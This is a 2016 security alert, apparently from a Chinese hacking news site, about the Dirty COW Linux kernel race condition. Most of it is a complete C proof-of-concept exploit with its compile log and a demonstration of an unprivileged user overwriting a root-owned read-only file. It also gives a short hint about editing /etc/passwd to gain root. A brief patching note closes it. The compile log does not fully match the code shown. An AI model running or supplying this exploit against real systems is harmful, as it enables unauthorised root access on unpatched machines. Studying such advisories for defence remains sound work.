Linux kernel Dirty COW privilege escalation vulnerability alert - vulnerability alert - 黑吧安全网 (MyHack58)

2016-10-29T00:00:00
ID MYHACK58:62201680685
Type myhack58
Reporter Anonymous
Modified 2016-10-29T00:00:00

Description

The Linux kernel's memory subsystem contains a race condition in the way it handles copy-on-write (COW) breakage of private read-only memory mappings. A low-privileged local user can exploit this race to gain write access to read-only memory mappings, which can lead to privilege escalation.

Vulnerability impact: a low-privileged user can use this vulnerability to modify read-only memory and then execute arbitrary code to gain root privileges.

Scope of impact: this vulnerability affects all Linux kernel versions >= 2.6.22. Version 2.6.22 was released in 2007, so the vulnerability affects almost every kernel released since 2007.

Vulnerability testing: read /proc/version to get the Linux kernel version:

```
➜ ~ cat /proc/version
Linux version 4.4.0-42-generic (buildd@lgw01-13) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.2) ) #62-Ubuntu SMP Fri Oct 7 23:11:45 UTC 2016
```

The kernel is version 4.4.0, which is affected. The POC published on GitHub is:

```c
#include <stdio.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <pthread.h>
#include <string.h>
#include <stdint.h>
/* unistd.h and sys/stat.h declare lseek/write/fstat; the original file
   omitted them, which is what the implicit-declaration warnings in the
   compile log below are about. */
#include <unistd.h>
#include <sys/stat.h>

void *map;        /* private, read-only mapping of the target file */
int f;
struct stat st;
char *name;

/* Thread 1: repeatedly drops the mapped pages so the kernel has to
   fault them in again, racing against the writer thread. */
void *madviseThread(void *arg)
{
  char *str;
  str = (char *)arg;
  int i, c = 0;
  for (i = 0; i < 100000000; i++) {
    c += madvise(map, 100, MADV_DONTNEED);
  }
  printf("madvise %d\n", c);
  return NULL;
}

/* Thread 2: repeatedly writes the new content to the mapping's address
   through /proc/self/mem. */
void *procselfmemThread(void *arg)
{
  char *str;
  str = (char *)arg;
  int f = open("/proc/self/mem", O_RDWR);
  int i, c = 0;
  for (i = 0; i < 100000000; i++) {
    lseek(f, (off_t)(uintptr_t)map, SEEK_SET);
    c += write(f, str, strlen(str));
  }
  printf("procselfmem %d\n", c);
  return NULL;
}

/* usage: ./a.out <read-only file> <string to write> */
int main(int argc, char *argv[])
{
  if (argc < 3) return 1;
  pthread_t pth1, pth2;
  f = open(argv[1], O_RDONLY);
  fstat(f, &st);
  name = argv[1];
  map = mmap(NULL, st.st_size, PROT_READ, MAP_PRIVATE, f, 0);
  printf("mmap %x\n", (unsigned)(uintptr_t)map);
  pthread_create(&pth1, NULL, madviseThread, argv[1]);
  pthread_create(&pth2, NULL, procselfmemThread, argv[2]);
  pthread_join(pth1, NULL);
  pthread_join(pth2, NULL);
  return 0;
}
```

This POC exploits the vulnerability to modify the contents of an arbitrary file; see the following test:

```
➜ /tmp gcc a.c -lpthread
a.c: In function ‘procselfmemThread’:
a.c:28:5: warning: implicit declaration of function ‘lseek’ [-Wimplicit-function-declaration]
     lseek(f, map, SEEK_SET);
a.c:29:10: warning: implicit declaration of function ‘write’ [-Wimplicit-function-declaration]
     c += write(f, str, strlen(str));
a.c: In function ‘main’:
a.c:39:3: warning: implicit declaration of function ‘fstat’ [-Wimplicit-function-declaration]
   fstat(f, &st);
```

Compiling this payload with gcc produces a few warnings, but it still compiles successfully.

```
➜ /tmp su root -c 'echo 0000 > test'
Password:
➜ /tmp ls -al test
-rw-r--r-- 1 root root 5 Oct 16 23:52 test
```

As root, create a test file that other users can only read: permission 644, content 0000.

```
➜ /tmp id
uid=1000(Monster) gid=1000(monster) groups=1000(monster)
➜ /tmp ./a.out test 1111
mmap 61222000
madvise 0
procselfmem 400000000
```

As the current unprivileged user, run the compiled a.out to change the file's contents to 1111. After a long wait, the program finally finishes.

```
➜ /tmp cat test
1111
```

As the result shows, the contents of the test file have been successfully modified. In the same way, changing the current user's uid in /etc/passwd to 0 allows logging in as root.

Fix: update to the latest Linux kernel source code and recompile. Each distribution has also released an updated kernel; alternatively, upgrade directly to the latest version.